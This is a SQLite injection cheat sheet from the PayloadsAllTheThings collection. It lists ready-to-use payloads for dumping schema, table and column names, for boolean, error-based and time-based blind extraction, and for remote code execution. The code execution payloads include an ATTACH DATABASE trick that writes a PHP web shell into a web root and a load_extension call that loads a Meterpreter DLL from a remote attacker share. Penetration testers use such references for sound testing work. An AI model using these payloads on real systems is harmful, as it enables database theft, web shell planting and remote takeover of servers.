PayloadsAllTheThings/SQL Injection/SQLite Injection.md

SQLite Injection

SQLite Injection is a type of security vulnerability that occurs when an attacker can insert or "inject" malicious SQL code into SQL queries executed by an SQLite database. This vulnerability arises when user inputs are integrated into SQL statements without proper sanitization or parameterization, allowing attackers to manipulate the query logic. Such injections can lead to unauthorized data access, data manipulation, and other severe security issues.

Summary

• SQLite Comments
• SQLite Version
• String Based - Extract Database Structure
• Integer/String Based - Extract Table Name
• Integer/String Based - Extract Column Name
• Boolean - Count Number Of Tables
• Boolean - Enumerating Table Name
• Boolean - Extract Info
• Boolean - Error Based
• Time Based
• Remote Code Execution
  • Attach Database
  • Load_extension
• References

SQLite Comments

--
/**/

SQLite Version

select sqlite_version();

String Based - Extract Database Structure

SELECT sql FROM sqlite_schema

if sqlite_version > 3.33.0

SELECT sql FROM sqlite_master

Integer/String Based - Extract Table Name

SELECT group_concat(tbl_name) FROM sqlite_master WHERE type='table' and tbl_name NOT like 'sqlite_%'

Integer/String Based - Extract Column Name

SELECT sql FROM sqlite_master WHERE type!='meta' AND sql NOT NULL AND name ='table_name'

For a clean output

SELECT replace(replace(replace(replace(replace(replace(replace(replace(replace(replace(substr((substr(sql,instr(sql,'(')%2b1)),instr((substr(sql,instr(sql,'(')%2b1)),'')),"TEXT",''),"INTEGER",''),"AUTOINCREMENT",''),"PRIMARY KEY",''),"UNIQUE",''),"NUMERIC",''),"REAL",''),"BLOB",''),"NOT NULL",''),",",'~~') FROM sqlite_master WHERE type!='meta' AND sql NOT NULL AND name NOT LIKE 'sqlite_%' AND name ='table_name'

Cleaner output

SELECT GROUP_CONCAT(name) AS column_names FROM pragma_table_info('table_name');

Boolean - Count Number Of Tables

and (SELECT count(tbl_name) FROM sqlite_master WHERE type='table' and tbl_name NOT like 'sqlite_%' ) < number_of_table

Boolean - Enumerating Table Name

and (SELECT length(tbl_name) FROM sqlite_master WHERE type='table' and tbl_name not like 'sqlite_%' limit 1 offset 0)=table_name_length_number

Boolean - Extract Info

and (SELECT hex(substr(tbl_name,1,1)) FROM sqlite_master WHERE type='table' and tbl_name NOT like 'sqlite_%' limit 1 offset 0) > hex('some_char')

Boolean - Extract Info (order by)

CASE WHEN (SELECT hex(substr(sql,1,1)) FROM sqlite_master WHERE type='table' and tbl_name NOT like 'sqlite_%' limit 1 offset 0) = hex('some_char') THEN <order_element_1> ELSE <order_element_2> END

Boolean - Error Based

AND CASE WHEN [BOOLEAN_QUERY] THEN 1 ELSE load_extension(1) END

Time Based

AND [RANDNUM]=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2))))

Remote Code Execution

Attach Database

ATTACH DATABASE '/var/www/lol.php' AS lol;
CREATE TABLE lol.pwn (dataz text);
INSERT INTO lol.pwn (dataz) VALUES ("<?php system($_GET['cmd']); ?>");--

Load_extension

UNION SELECT 1,load_extension('\\evilhost\evilshare\meterpreter.dll','DllMain');--

Note: By default this component is disabled.

References

• Injecting SQLite database based application - Manish Kishan Tanwar - February 14, 2017
• SQLite Error Based Injection for Enumeration - Rio Asmara Suryadi - February 6, 2021
• SQLite3 Injection Cheat sheet - Nickosaurus Hax - May 31, 2012